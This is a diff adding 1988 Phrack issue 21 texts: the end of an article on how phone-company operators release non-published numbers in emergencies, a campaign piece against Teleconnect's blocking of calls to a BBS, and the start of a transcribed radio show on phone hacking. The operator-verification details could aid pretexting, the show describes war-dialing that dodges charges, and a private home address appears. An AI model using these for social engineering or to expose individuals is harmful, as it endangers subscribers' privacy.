+emergency exists, which is the only valid reason for breaking security.  The
+supervisor may, if they are doing their job correctly, ask the inquirer point
+blank, "Are you stating there is an emergency situation?"
+
+Please bear in mind that the law in Illinois and in many other states says that
+if a person claims that an emergency exists in order to influence the use (or
+discontinuance of use) of the telephone when in fact there is no emergency is
+guilty of a misdemeanor crime.  You say yes this is an emergency and I need to
+contact my brother/sister/etc right away.  The supervisor will then talk to
+his/her supervisor, who is generally of the rank of Chief Operator for that
+particular facility.
+
+The Chief Operator will call the NonPub people, will identify herself, and
+*leave her own call back number*.  The NonPub people will call back to verify
+the origin of the call, and only then will there be information given out
+regards your brother's telephone number.  It helps if you know the *exact* way
+the name appears in the records, and the *exact* address; if there is more than
+one of that name with non-pub service, they may tell you they are unable to
+figure out who it is you want.
+
+The NonPub person will then call the subscriber with the non-published number
+and explain to them what has occurred, "So and so has contacted one of our
+operators and asked for assistance in reaching you.  The party states that it
+is a family emergency which requires your immediate attention.  Would it be
+alright if we give him/her your number, or would you prefer to call them back
+yourself?"
+
+Based on the answer given, the number is either relayed back to the Chief
+Operator, or a message is relayed back saying the non-pub customer has been
+notified.  If the customer says it is okay to pass his number, then the Chief
+Operator will call you back, ask who YOU are, rather than saying WHO she wants,
+and satisfied with your identification will give you the number you are seeking
+or will advise you that your brother has been given the message by someone from
+our office, and has said he will contact you.
+
+Before the NonPub people will even talk to you, your 'call back number' has to
+be on their list of approved numbers for that purpose.  A clerk in the Business
+office cannot imitate a Chief Operator for example, simply because NonPub would
+say that the number you are asking us to call back to is not on our list.
+"Tell your supervisor what it is you are seeking and have them call us..."
+Other emergency type requests for non-pub numbers would be a big fire at some
+business place in the middle of the night, and the owners of the company must
+be notified at their home; or a child is found wandering by the police and the
+child is too young to know his parent's (non-pub) number.
+
+They will also handle non-emergency requests, but only if they are of some
+importance and not frivolous in nature.  You have just come to our city to
+visit and are seeking a long lost friend who has a non-pub number; you are
+compiling the invitations to your high school class fiftieth re-union and find
+a class member is non-pub.  Within certain reasonable limits, they will pass
+along your request to the desired party and let them make the choice of whether
+to return the call or not.  But always, you leave your phone number with them,
+and in due time someone will call you back to report what has been said or
+done.
+
+You would be surprised -- or maybe you wouldn't -- at the numerous scams and
+stories people tell the phone company to get the non-pub numbers of someone
+else.  Fortunately, Bell takes a great deal of pride in their efforts to
+protect the privacy of their subscribers.
+
+-PT
+_______________________________________________________________________________
diff --git a/phrack21/8.txt b/phrack21/8.txt
new file mode 100644
index 0000000..770759d
--- /dev/null
+++ b/phrack21/8.txt
@@ -0,0 +1,425 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 8 of 11
+
+         \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+         \`\                                                       \`\
+         \`\            BLOCKING OF LONG-DISTANCE CALLS            \`\
+         \`\                   by Jim Schmickley                   \`\
+         \`\                                                       \`\
+         \`\            Hawkeye PC, Cedar Rapids, Iowa             \`\
+         \`\                                                       \`\
+         \`\            Special Thanks To Hatchet Molly            \`\
+         \`\                                                       \`\
+         \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+
+
+SUMMARY -- This file describes the "blocking" by one long-distance telephone
+company of access through their system to certain telephone numbers,
+particularly BBS numbers.  The blocking is applied in a very arbitrary manner,
+and the company arrogantly asserts that BBS SYSOPS and anyone who uses a
+computer modem are "hackers."
+
+The company doesn't really want to discuss the situation, but it appears the
+following scenario occurred.  The proverbial "person or persons unknown"
+identified one or more "valid" long-distance account numbers, and subsequently
+used those numbers on one or more occasions to fraudulently call a legitimate
+computer bulletin board system (BBS).  When the long-distance company
+discovered the fraudulent charges, they "blocked" the line without bothering to
+investigate or contacting the BBS System Operator to obtain his assistance.  In
+fact, the company did not even determine the sysop's name.
+
+The long-distance carrier would like to pretend that the incident which
+triggered the actions described in this article was an isolated situation, not
+related to anything else in the world.  However, there are major principles of
+free, uninhibited communications and individual rights deeply interwoven into
+the issue.  And, there is still the lingering question, "If one long-distance
+company is interfering with their customers' communications on little more than
+a whim, are other long-distant companies also interfering with the American
+public's right of free 'electronic speech'?"
+
+CALL TO ACTION -- Your inputs and protests are needed now to counter the
+long-distance company's claims that "no one was hurt by their blocking actions
+because nobody complained."  Obviously nobody complained for a long time
+because the line blocking was carried out in such a manner that no one
+realized, until April 1988, what was being done.
+
+Please read through the rest of this article and judge for yourself.  Then,
+please write to the organizations listed at the end of the article; insist that
+your right to telephone whatever number you choose should not be impaired by
+the arbitrary decision of some telephone company bureaucrat who really doesn't
+care about the rights of his customers.  Protest in the strongest terms.  And,
+remember, the rights you save WILL BE YOUR OWN!
+
+SETTING THE SCENE -- Teleconnect is a long-distance carrier and telephone
+direct marketing company headquartered in Cedar Rapids, Iowa.  The company is
+about eight years old, and has a long-distance business base of approximately
+200,000 customers.  Teleconnect has just completed its first public stock
+offering, and is presently (August 1988) involved in a merger which will make
+it the nation's fourth-largest long-distance carrier.  It is a very rapidly
+growing company, having achieved its spectacular growth by offering long
+distance service at rates advertised as being 15% to 30% below AT&T's rates.
+
+When Teleconnect started out in the telephone interconnection business,
+few, if any, exchanges were set up for "equal access," so the company set up a
+network of local access numbers (essentially just unlisted local PABXs -
+Private Automatic Branch eXchanges) and assigned a six-digit account number to
+each customer.  Later, a seventh "security" digit was added to all account
+numbers.  Teleconnect now offers direct "equal access" dialing on most
+exchanges, but the older access number/account code system is still in place
+for those exchanges which do not offer "equal access."  That system is still
+very useful for customers who place calls from their offices or other locations
+away from home.
+
+"BLOCKING" DISCOVERED -- In early April 1988, a friend mentioned that
+Teleconnect was "blocking" certain telephone lines where they detected computer
+tone.  In particular, he had been unable to call Curt Kyhl's Stock Exchange BBS
+in Waterloo, Iowa.  This sounded like something I should certainly look into,
+so I tried to call Curt's BBS.
+
+CONTACT WITH TELECONNECT -- Teleconnect would not allow my call to go through.
+Instead, I got a recorded voice message stating that the call was a local call
+from my location.  A second attempt got the same recorded message.  At least,
+they were consistent.
+
+I called my Teleconnect service representative and asked just what the problem
+was.  After I explained what happened, she suggested that it must be a local
+call.  I explained that I really didn't think a 70 mile call from Cedar Rapids
+to Waterloo was a local call.  She checked on the situation and informed me
+that the line was being "blocked."  I asked why, and she "supposed it was at
+the customer's request."  After being advised that statement made no sense, she
+admitted she really didn't know why.  So, on to her supervisor.
+
+The first level supervisor verified the line was being "blocked by Teleconnect
+security," but she couldn't or wouldn't say why.  Then, she challenged, "Why do
+you want to call that number?"  That was the wrong question to ask this unhappy
+customer, and the lady quickly discovered that bit of information was none of
+her business.  On to her supervisor...
+
+The second level supervisor refused to reveal any information of value to
+a mere customer, but she did suggest that any line Teleconnect was blocking
+could still be reached through AT&T or Northwestern Bell by dialing 10288-1.
+When questioned why Teleconnect, which for years had sold its long-distance
+service on the basis of a cost-saving over AT&T rates, was now suggesting that
+customers use AT&T, the lady had no answer.
+
+I was then informed that, if I needed more information, I should contact
+Dan Rogers, Teleconnect's Vice President for Customer Service.  That sounded
+good; "Please connect me."  Then, "I'm sorry, but Mr. Rogers is out of town,
+and won't be back until next week."  "Next week?"  "But he does call in
+regularly.  Maybe he could call you back before that."  Mr. Rogers did call me
+back, later that day, from Washington, D.C. where he and some Teleconnect
+"security people" were attending a conference on telephone security.
+
+TELECONNECT RESPONDS, A LITTLE -- Dan Rogers prefaced his conversation with,
+"I'm just the mouthpiece; I don't understand all the technical details.  Our
+security people are blocking that number because we've had some problems with
+it in the past."  I protested that the allegation of "problems" didn't make
+sense because the number was for a computer bulletin board system operated by a
+reputable businessman, Curt Kyhl.
+
+Mr. Rogers said that I had just given Teleconnect new information; they had not
+been able to determine whose number they were blocking.  "Our people are good,
+but they're not that good.  Northwestern Bell won't release subscriber
+information to us."  And, when he got back to his office the following Monday,
+he would have the security people check to see if the block could be removed.
+
+The following Monday, another woman from Teleconnect called to inform me that
+they had checked the line, and they were removing the block from it.  She added
+the comment that this was the first time in four years that anyone had
+requested that a line be unblocked.  I suggested that it probably wouldn't be
+the last time.
+
+In a later telephone conversation, Dan Rogers verified that the block had been
+removed from Curt Kyhl's line, but warned that the line would be blocked
+again "if there were any more problems with it."  A brief, non-conclusive
+discussion of Teleconnect's right to take such action then ensued.  I added
+that the fact that Teleconnect "security" had been unable to determine the
+identity of the SYSOP of the blocked board just didn't make sense; that it
+didn't sound as if the "security people" were very competent.  Mr. Rogers then
+admitted that every time the security people tried to call the number, they
+got a busy signal (and, although Mr. Rogers didn't admit it, they just "gave
+up," and arbitrarily blocked the line).  Oh, yes, the lying voice message,
+"This is a local call...," was not intended to deceive anyone according to Dan
+Rogers.  It was just that Teleconnect could only put so many messages on their
+equipment, and that was the one they selected for blocked lines.
+
+BEGINNING THE PAPER TRAIL -- Obviously, Teleconnect was not going to pay much
+attention to telephone calls from mere customers.  On April 22, Ben Blackstock,
+practicing attorney and veteran sysop, wrote to Mr. Rogers urging
+that Teleconnect permit their customers to call whatever numbers they desired.
+Ben questioned Teleconnect's authority to block calls, and suggested that such
+action had serious overlays of "big brother."  He also noted that "you cannot
+punish the innocent to get at someone who is apparently causing Teleconnect
+difficulty."
+
+Casey D. Mahon, Senior Vice President and General Counsel of Teleconnect,
+replied to Ben Blackstock's letter on April 28th.  This response was the start
+of Teleconnect's seemingly endless stream of vague, general allegations
+regarding "hackers" and "computer billboards."  Teleconnect insisted they did
+have authority to block access to telephone lines, and cited 18 USC
+2511(2)(a)(i) as an example of the authority.  The Teleconnect position was
+summed up in the letter:
+
+    "Finally, please be advised the company is willing to 'unblock' the line in
+    order to ascertain whether or not illegal hacking has ceased.  In the
+    event, however, that theft of Teleconnect long distance services through
+    use of the bulletin board resumes, we will certainly block access through
+    the Teleconnect network again and use our authority under federal law to
+    ascertain the identity of the hacker or hackers."
+
+THE GAUNTLET IS PICKED UP -- Mr. Blackstock checked the cited section of the
+U.S. Code, and discovered that it related only to "interception" of
+communications, but had nothing to do with "blocking."  He advised me of his
+opinion and also wrote back to Casey Mahon challenging her interpretation of
+that section of federal law.
+
+In his letter, Ben noted that, "Either Teleconnect is providing a communication
+service that is not discriminatory, or it is not."  He added that he would
+"become upset, to say the least" if he discovered that Teleconnect was blocking
+access to his BBS.  Mr. Blackstock concluded by offering to cooperate with
+Teleconnect in seeking a declaratory judgment regarding their "right" to block
+a telephone number based upon the actions of some third party.  To date,
+Teleconnect has not responded to that offer.
+
+On May 13th, I sent my own reply to Casey Mahon, and answered the issues of her
+letter point by point.  I noted that even I, not an attorney, knew the
+difference between "interception" and "blocking", and if Teleconnect didn't,
+they could check with any football fan.  My letter concluded:
+
+    "Since Teleconnect's 'blocking' policies are ill-conceived, thoughtlessly
+    arbitrary, anti-consumer, and of questionable legality, they need to be
+    corrected immediately.  Please advise me how Teleconnect is revising these
+    policies to ensure that I and all other legitimate subscribers will have
+    uninhibited access to any and all long-distance numbers we choose to call."
+
+Casey Mahon replied on June 3rd.  Not unexpectedly, she brushed aside all
+my arguments.  She also presented the first of the sweeping generalizations,
+with total avoidance of specifics, which we have since come to recognize as a
+Teleconnect trademark.  One paragraph neatly sums Casey Mahon's letter:
+
+    "While I appreciate the time and thought that obviously went into your
+    letter, I do not agree with your conclusion that Teleconnect's efforts to
+    prevent theft of its services are in any way inappropriate.  The
+    inter-exchange industry has been plagued, throughout its history, by
+    individuals who devote substantial ingenuity to the theft of long distance
+    services.  It is not unheard of for an interexchange company to lose as
+    much as $500,000 a month to theft.  As you can imagine, such losses, over a
+    period of time, could drive a company out of business."
+
+ESCALATION -- By this time it was very obvious that Teleconnect was going to
+remain recalcitrant until some third party, preferably a regulatory agency,
+convinced them of the error of their ways.  Accordingly, I assembled the file
+and added a letter of complaint addressed to the Iowa Utilities Board.  The
+complaint simply asked that Teleconnect be directed to institute appropriate
+safeguards to ensure that "innocent third parties" would no longer be adversely
+affected by Teleconnect's arbitrary "blocking" policies.
+
+My letter of complaint was dated July 7, 1988 and the Iowa Utilities Board
+replied on July 13, 1988.  The The reply stated that Teleconnect was required
+to respond to my complaint by August 2, 1988, and the Board would then propose
+a resolution.  If the proposed resolution was not satisfactory, I could request
+that the file be reopened and the complaint be reconsidered.  If the results
+of that action were not satisfactory, a formal hearing could be requested.
+
+After filing the complaint, I also sent a copy of the file to Congressman Tom
+Tauke.  Mr. Tauke represents the Second Congressional District of Iowa, which
+includes Cedar Rapids, and is also a member of the House Telecommunications
+Subcommittee.  I have subsequently had a personal conversation with Mr. Tauke
+as well as additional correspondence on the subject.  He seems to have a deep
+and genuine interest in the issue, but at my request, is simply an interested
+observer at this time.  It is our hope that the Iowa Utilities Board will
+propose an acceptable resolution without additional help.
+
+AN UNRESPONSIVE RESPONSE -- Teleconnect's "response" to the Iowa Utilities
+Board was filed July 29, 1988.  As anticipated, it was a mass of vague
+generalities and unsubstantiated allegations.  However, it offered one item of
+new, and shocking, information; Curt Kyhl's BBS had been blocked for ten
+months, from June 6, 1987 to mid-April 1988.  (At this point it should be noted
+that Teleconnect's customers had no idea that the company was blocking some of
+our calls.  We just assumed that calls weren't going through because of
+Teleconnect's technical problems).
+
+Teleconnect avoided putting any specific, or even relevant, information in
+their letter.  However, they did offer to whisper in the staff's ear;
+"Teleconnect would be willing to share detailed information regarding this
+specific case, and hacking in general, with the Board's staff, as it has in the
+past with various federal and local law enforcement agencies, including the
+United States Secret Service.  Teleconnect respectfully requests, however, that
+the board agree to keep such information confidential, as to do otherwise would
+involve public disclosure of ongoing investigations of criminal conduct and the
+methods by which interexchange carriers, including Teleconnect, detect such
+theft."
+
+There is no indication of whether anyone felt that such a "confidential"
+meeting would violate Iowa's Open Meetings Law.  Nobody apparently questioned
+why, during a ten-months long "ongoing investigation," Teleconnect seemed
+unable to determine the name of the individual whose line they were blocking.
+Of course, whatever they did was justified because in their own words,
+"Teleconnect had suffered substantial dollar losses as a result of the theft of
+long distance services by means of computer 'hacking' utilizing the computer
+billboard which is available at that number."
+
+Teleconnect's most vile allegation was, "Many times, the hacker will enter the
+stolen authorization code on computer billboards, allowing others to steal long
+distance services by utilizing the code."  But no harm was done by the blocking
+of the BBS number because, "During the ten month period the number was blocked,
+Teleconnect received no complaints from anyone claiming to be the party to whom
+the number was assigned."  The fact that Curt Kyhl had no way of knowing his
+line was being blocked might have had something to do with the fact that he
+didn't complain.
+
+It was also pointed out that I really had no right to complain since, "First,
+and foremost, Mr. Schmickley is not the subscriber to the number."  That is
+true, I'm just a long-time Teleconnect customer who was refused service because
+of an alleged act performed by an unknown third party.
+
+Then Teleconnect dumped on the Utilities Board staff a copy of a seven page
+article from Business Week Magazine, entitled "Is Your Computer Secure?"  This
+article was totally unrelated to the theft of long-distance service, except for
+an excerpt from a sidebar story about a West German hackers' club.  The story
+reported that, "In 1984, Chaos uncovered a security hole in the videotex system
+that the German telephone authority, the Deutsche Bundespost, was building.
+When the agency ignored club warnings that messages in a customer's private
+electronic mailbox weren't secure, Chaos members set out to prove the point.
+They logged on to computers at Hamburger Sparkasse, a savings bank, and
+programmed them to make thousands of videotex calls to Chaos headquarters on
+one weekend.  After only two days of this, the bank owed the Bundespost $75,000
+in telephone charges."
+
+RESOLUTION WITH A RUBBER STAMP -- The staff of the Iowa Utilities Board replied
+to my complaint by letter on August 19, 1988.  They apparently accepted the
+vague innuendo submitted by Teleconnect without any verification; "Considering
+the illegal actions reportedly to be taking place on number (319) 236-0834, it
+appears the blocking was reasonable.  However, we believe the Board should be
+notified shortly after the blocking and permission should be obtained to
+continue the blocking for any period of time."
+
+However, it was also noted that, "Iowa Code 476.20 (1) (1987) states, 'A
+utility shall not, except in cases of emergency, discontinue, reduce, or impair
+service to a community or a part of a community, except for nonpayment of
+account or violation of rules and regulations, unless and until permission to
+do so is obtained from the Board."  The letter further clarified, "Although the
+Iowa Code is subject to interpretation, it appears to staff that 'emergency'
+refers to a relatively short time..."
+
+CONSIDER THE EVIDENCE -- Since it appeared obvious that the Utilities Board
+staff had not questioned or investigated a single one of Teleconnect's
+allegations, the staff's response was absolutely astounding.  Accordingly, I
+filed a request for reconsideration on August 22nd.
+
+Three points were raised in the request for reconsideration;
+
+    (1) The staff's evaluation should have been focused on the denial of
+        service to me and countless others of Teleconnect's 200,000 customers,
+        and not just on the blocking of incoming calls to one BBS.
+
+    (2) The staff accepted all of Teleconnect's allegations as fact, although
+        not one bit of hard evidence was presented in support of those
+        allegations.
+
+    (3) In the words of the staff's own citation, it appeared that Teleconnect
+        had violated Iowa Code 476.20 (1) (1987) continuously over a ten
+        months' period, perhaps as long as four years.
+
+Since Teleconnect had dumped a seven page irrelevant magazine article on the
+staff, it seemed only fair to now offer a two page completely relevant story to
+them.  This was "On Your Computer - Bulletin Boards," from the June 1988 issue
+of "Changing Times."  This excellent article cited nine BBSs as "good places to
+get started."  Among the nine listed BBSs was Curt Kyhl's "Stock Exchange,
+Waterloo, Iowa (319-236-0834)."  Even the geniuses at Teleconnect ought to be
+able to recognize that this BBS, recommended by a national magazine, is the
+very same one they blocked for ten months.
+
+MEANWHILE, BACK AT THE RANCH -- You are now up-to-date on the entire story.
+Now, we are in the process of spreading the word so that all interested people
+can contact the Iowa authorities so they will get the message that this case is
+much bigger than the blocking of one BBS.  YOU can help.
+
+Read the notice appended to this file and ACT.  If you are a Teleconnect
+customer, it is very important that you write the agencies listed on the
+notice.  If you are not a Teleconnect customer, but are interested in
+preserving your rights to uninhibited communications, you can help the cause by
+writing to those agencies, also.  Please, people, write now!  Before it is too
+late!
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                   T E L E C O N N E C T   C U S T O M E R S
+               = = = = = = = = = = = = =   = = = = = = = = = = =
+
+         If you are user of Teleconnect's long distance telephone service, you
+need to be aware of their "blocking" policy:
+
+    Teleconnect has been "lashing out" against the callers of bulletin boards
+    and other "computer numbers" by blocking access of legitimate subscribers
+    to certain phone numbers to which calls have been made with fraudulent
+    Teleconnect charge numbers.  Curt Kyhl's Stock Exchange Bulletin Board in
+    Waterloo has been "blocked" in such a manner.  Teleconnect representatives
+    have indicated that other "computer numbers" have been the objects of
+    similar action in the past, and that they (Teleconnect) have a "right" to
+    continue such action in the future.
+
+    Aside from the trampling of individual rights guaranteed by the Bill of
+    Rights of the U.S. Constitution, this arbitrary action serves only to
+    "punish the innocent" Teleconnect customers and bulletin board operators,
+    while doing absolutely nothing to identify, punish, or obtain payment from
+    the guilty.  The capping irony is that Teleconnect, which advertises as
+    offering significant savings over AT&T long-distance rates, now suggests to
+    complaining customers that the blocked number can still be dialed through
+    AT&T.
+
+    Please write to Teleconnect.  Explain how long you have been a customer,
+    that your modem generates a significant amount of the revenue they collect
+    from you, and that you strongly object to their arbitrarily deciding what
+    numbers you may or may not call.  Challenge their "right" to institute a
+    "blocking" policy and insist that the policy be changed.  Send your
+    protests to:
+                     Teleconnect Company
+                     Mr. Dan Rogers, Vice President for Customer Service
+                     500 Second Avenue, S.E.
+                     Cedar Rapids, Iowa  52401
+
+    A complaint filed with the Iowa Utilities Board has been initially resolved
+    in favor of Teleconnect.  A request for reconsideration has been filed, and
+    the time is NOW for YOU to write letters to the State of Iowa.  Please
+    write NOW to:
+                     Mr. Gerald W. Winter, Supervisor, Consumer Services
+                     Iowa State Utilities Board
+                     Lucas State Office Building
+                     Des Moines, Iowa  50319
+         And to:
+                     Mr. James Maret
+                     Office of the Consumer Advocate
+                     Lucas State Office Building
+                     Des Moines, Iowa  50319
+
+              Write now.  The rights you save WILL be your own.
+
+After filing a request for reconsideration of my complaint, I received a reply
+from the Iowa State Utilities Board which said, in part:
+
+    "Thank you for your letter dated August 22, 1988, with additional comments
+    concerning your complaint on the blocking of access to certain telephone
+    numbers by Teleconnect.
+
+    "To ensure that the issues are properly investigated, we are forwarding
+    your comments to the company and requesting a response by September 15,
+    1988."
+
+Again, this is a very large issue.  Simply stated; Does ANY telephone company
+have the right to "block" (or refuse to place) calls to ANY number on the basis
+of unsubstantiated, uninvestigated charges of "telephone fraud," especially
+when the alleged fraud was committed by a third party without the knowledge of
+the called party?  In the specific case, the question becomes; Can a long
+distance carrier refuse to handle calls to a BBS solely because some unknown
+crook has placed fraudulently-charged calls to that BBS?  Incidentally, when
+you write, please cite file number C-88-161.
+
+If you have any additional information which might be helpful in this
+battle, please let me know.
+
+You can send mail to me via U.S. Mail to:  Jim Schmickley
+                                           7441 Commune Court, N.E.
+                                           Cedar Rapids, Iowa  52402
+
+ (See "On The Edge Of Forever" in PWN XXI/1 for an update on this issue. -KL)
diff --git a/phrack21/9.txt b/phrack21/9.txt
new file mode 100644
index 0000000..98f220e
--- /dev/null
+++ b/phrack21/9.txt
@@ -0,0 +1,1266 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 9 of 11
+
+    PWN PWN PWN PWN PWN PWN PWN Special Edition PWN PWN PWN PWN PWN PWN
+    PWN                                                             PWN
+    PWN                        Phrack World News                    PWN
+    PWN                    Special Edition Issue Two                PWN
+    PWN                                                             PWN
+    PWN                  Created, Written, and Edited               PWN
+    PWN                       by Knight Lightning                   PWN
+    PWN                                                             PWN
+    PWN                 Special Thanks To Hatchet Molly             PWN
+    PWN                                                             PWN
+    PWN PWN PWN PWN PWN PWN PWN Special Edition PWN PWN PWN PWN PWN PWN
+
+
+                     Ed Schwartz Show on WGN Radio 720 AM
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                            September, 27-28, 1988
+
+                         Transcribed by Hatchet Molly
+
+
+Hello.  In this special presentation of Phrack World News, we have the abridged
+transcripts from the Ed Schwartz Show, a late night talk show broadcast by
+WGN Radio 720 AM - Chicago, Illinois.
+
+The transcripts that appear here in Phrack have been edited for this
+presentation.  For the most part, I have decided to omit the unrelated chatter
+as well as any comments or discussions that are not pertinent to the intent of
+Phrack World News.  In addition to this, I have also edited the speech somewhat
+to make it more intelligible, not an easy task.  However, the complete unedited
+version of this broadcast can be found on The Phoenix Project (512)441-3088,
+sysoped by The Mentor.
+
+:Knight Lightning
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+The Cast;
+
+A  = Anna (Self-proclaimed phone phreak in Kansas City, Missouri)
+AA = Sergeant Abagail Abraham (Illinois State Police; Computer Crime Section)
+B  = Bob (A bulletin board system operator)
+BG = Bob Gates (Manager of Corporate Security for Ameritech)
+CM = Chuck Moran (Director of Internal Affairs; Ameritech Applied Technologies)
+D  = Dan (A computer science major at DeVry Technical Institute in Chicago, IL)
+ES = Edward Schwartz (Our host)
+EZ = Ed Zahdi (A researcher from THE READER, a local publication in Chicago)
+G  = Gordon (Hatchet Molly, a graduate student at Northern Illinois University)
+JM = John F. Maxfield (Our famous friend from BoardScan in Detroit, Michigan)
+K  = Kevin (A BBS sysop)
+L  = Louis (A caller)
+P  = Penny (A victim)
+R  = Robert (A legal hacker)
+R  = Ray (A former software pirate)
+S  = ?? (A consulting engineer)
+
+
+Also mentioned, but not on the show, was SHADOW HAWK of Chicago, Illinois, who
+was recently arrested for theft of software from AT&T, and TOM TCIMPIDIS, a
+famous sysop who was arrested for having, unknown to him, AT&T Calling Card
+numbers on his legal bulletin board.
+
+                                      ^*^
+
+ES: It's 12 minutes after the hour.  The hour, of course, is eleven o'clock. We
+    have a tremendous amount of commerce that goes on late at night and in the
+    early morning.  When I say commerce I'm talking about computer operations
+    of all kind from keypunching to tabulating - you name it.
+
+    We've done two programs with Ed Zahdi who is the researcher from THE READER
+    (the weekly newspaper) from the "straight dope" column.  Ed Zahdi does the
+    research and on two appearances (on two Friday nights) within the last year
+    or so on this program Ed Zahdi has received a number of phone calls...
+    about computer hacking, about people whose telephones mysteriously ring in
+    the middle of the night -- or almost any time of the day but constantly do
+    so and they pick up the phone and there's nobody there.
+
+    The last time Ed Zahdi was on, we were flooded with calls from people who
+    claimed that;
+
+    o  There are all kinds of telemarketing people who are ringing telephones.
+    o  That the phone company is testing phones and you don't know it.
+    o  That the phone network gets tested every day and everybody's phone rings
+       once or for half a ring and nobody's ever there.
+
+    I was amazed at the number and type of calls that came in. We called the
+    phone company and we asked for some cooperation and tonight we are having
+    as guests not only Mr. Ed Zahdi from THE READER, but also Mr. Chuck Moran,
+    the Director of Internal Affairs from Ameritech Applied Technologies.  We
+    also have Mr. Bob Gates, Manager of Corporate Security for Ameritech.
+
+    We're gonna get into this whole thing as to whether or not people are using
+    and abusing the phone networks.  Whether or not computer hackers are
+    ferreting out phone numbers with computers.  Whether or not you can really
+    program a computer to randomly ring every telephone in the city or not.
+
+    If you're a computer person hang around.  We're also going to talk about
+    some of the things that the phone company and other allied businesses are
+    doing to catch up with the computer hackers.
+JC: Well, that sounds interesting to me.
+ES: Well now are you ready for this?  The Bureau of Criminal Investigation of
+    the Illinois State Police has a computer fraud unit.
+JC: Uh-huh
+ES: And do you know what they like to do?
+JC: What do they like to do?
+ES: Lock up computer hackers.  Tonight we're going have the computer hackers
+    running for the hills!  Well maybe I should say "typing for the hills" huh?
+JC: Probably! (chuckle)
+ES: Because they don't run...most of them are couch potatoes.
+JC: That's right!
+ES: Glad to see you here Ed.
+EZ: Glad to be here Ed.  In In the "straight dope" we deal with all kinds of
+    questions one of the questions we got onto was the question of ghost
+    rings.  People would hear these things primarily at night.
+ES: On their home phone?
+EZ: On their home phone.  What would happen is that they'd be sitting at home
+    and the telephone would ring for a half a ring or a whole ring or maybe
+    even two rings.  They would pick it up and nobody would be there.  And I'd
+    heard about this in the past.  I thought it was some peculiarity of buying
+    a phone from K-Mart or who knows where.
+
+    We got easily a dozen calls in the course of the evening from people who
+    had the same experience happen to them.  And it would always, oddly
+    enough, happen at the same time of the night or on the same day of the
+    week at the same time of the night and it was pretty eerie.
+
+    We got one woman, who I've spoken to several times since who said that she
+    was an answering service operator and she had whole banks of phones and
+    sets of these phones would jingle once at a certain time of the night and
+    then the next day a different set would jingle at a certain time of the
+    night and then the following week or the following whenever the pattern
+    would repeat, but nobody was ever there.  And so we decided there had to be
+    some obvious solution to this problem and the speculation at the time was
+    that it was some sort of a testing program that the phone company had to
+    check out the trunk lines or something like that.
+
+    So, I called up the phone company, Illinois Bell, I called up CenTel,
+    called up Bell Labs, called up places like that to ask if they knew
+    anything about it.  I asked whether there was a testing program, if not
+    what explanation could they offer.  They said no, there was no testing
+    program, they had no idea.  They had some speculation they thought
+    conceivably some sort of computer ringing service was involved, but they
+    didn't have any really clear idea so we came back here a couple of months
+    ago to talk about it again.
+ES: We were swamped with calls again.
+EZ: I asked for the woman, whose name is Pat, who was the answering service
+    operator to give me a call.  She did and she volunteered to help us out
+    and see if we could use her phone system as a guinea pig and have the
+    telephone company try and find out, if they had means of doing this, what
+    the source of these ghost rings was.  One of the things she pointed out
+    was that during the Hinsdale fire or during the time that the Hinsdale
+    switching system was out of operation after the fire there the ghost rings
+    stopped.
+ES: Ahhhh!
+EZ: After it was repaired the rings started up again, but they were on a more
+    irregular basis whereas before they were sort of like clockwork at a given
+    time of the night.
+ES: Uh humm.
+EZ: Now the same sets of phones would ring on a given day, but at predictable
+    times.  And it would vary within an hour or so.  So what I hoped to do at
+    that point was to get together with Pat and try and get together with the
+    phone company at her place and see what we could find out.  Unfortunately
+    she got sick, had a bad infection, so she was out of work for a long time.
+ES: Uh humm.
+EZ: She has just recently gotten back on the job and I spoke her today and our
+    plan now is that I'll go over to her place of business on Thursday just to
+    see for myself and at that point I'm going to call up probably your friend
+    Ken Went at Illinois Bell.
+ES: Head of Security
+EZ: We'll see what we can find out and see if they'll do it for cheap 'cuz we
+    haven't got a whole lot of resources yet.  Now the problem is that the
+    connection only lasts for a split second and I hope that they can find
+    something out in that short of a period of time in terms of tracing but
+    its not clear to me that its totally possible.
+ES: Now one of the things that we found out when you were here a few
+    weeks ago on a Friday night was another element to all of this.
+    Telemarketers have been known to, in terms of getting a hold of people,
+    ring phones of people whose numbers they don't know.
+EZ: We got some real interesting things.  There were two basic theories here
+    that I guess that I should talk about.  One is that computer hackers do
+    this.  One of the things that computer hackers do is program their
+    computers to use their modems their modems to find other computers.  When
+    they find one, there will be a characteristic tone that will tell the
+    computer on the other end that its reached another computer.  If they
+    don't find a computer they can disconnect real quickly before the
+    connection is actually made and the charge is placed to their bills.  So
+    they can do this all for free basically.  They'll do this routinely to
+    try and find new locations of computers.
+ES: Right.
+EZ: So that was one theory.  The drawback to that theory is well, why would
+    they do this repeatedly with a given number?  Because obviously if the
+    computer isn't there Tuesday its not going to be there Friday afternoon.
+    Why would they try this repeatedly every week.  That was one problem.  The
+    second theory that was presented to us was that telemarketing firms do
+    this to keep their files up to date.  They want to find out if given
+    numbers are still in use or something along those lines.
+ES: Cause people do move and people do change their phone numbers.
+EZ: Right, so what they do is they dial a number up real quick and hang up
+    before you can answer it.  At least they can detect whether the line is
+    actually in use.  This gives them apparently some useful information.  So
+    these were the two main theories and there were several elaborations on
+    these that we'll probably hear more about tonight, but those were the
+    theories that we had. he problem of course as I say is its not clear
+    exactly what the advantage of doing this on a routine basis, weekly or
+    whenever would be to the person who is doing it.
+ES: There there are some very important elements to all of this.  First of all
+    there was a guy on yesterday morning who apparently filed some lawsuits
+    against companies that do telemarketing for disturbing him and he is going
+    to set a precedent that if you are bothered at home by telemarketers that
+    you can sue them and collect damages.
+
+    Not often a lot of money but enough to make them uhh sit up and take
+    notice and he is trying to teach other people how to sue telemarketing
+    people.
+
+              (Break for commercial followed by re-introductions)
+
+CM: Thank you, Ed. It is our pleasure to be here.
+ES: It's a pleasure to have you here.  Ameritech Applied Technologies is a
+    division of Ameritech the phone company, right?
+CM: Right. We're a subsidiary of Ameritech that that deals with information
+    technology needs of the Ameritech family which includes Illinois Bell.
+ES: What are some of the things you work on or are responsible for?
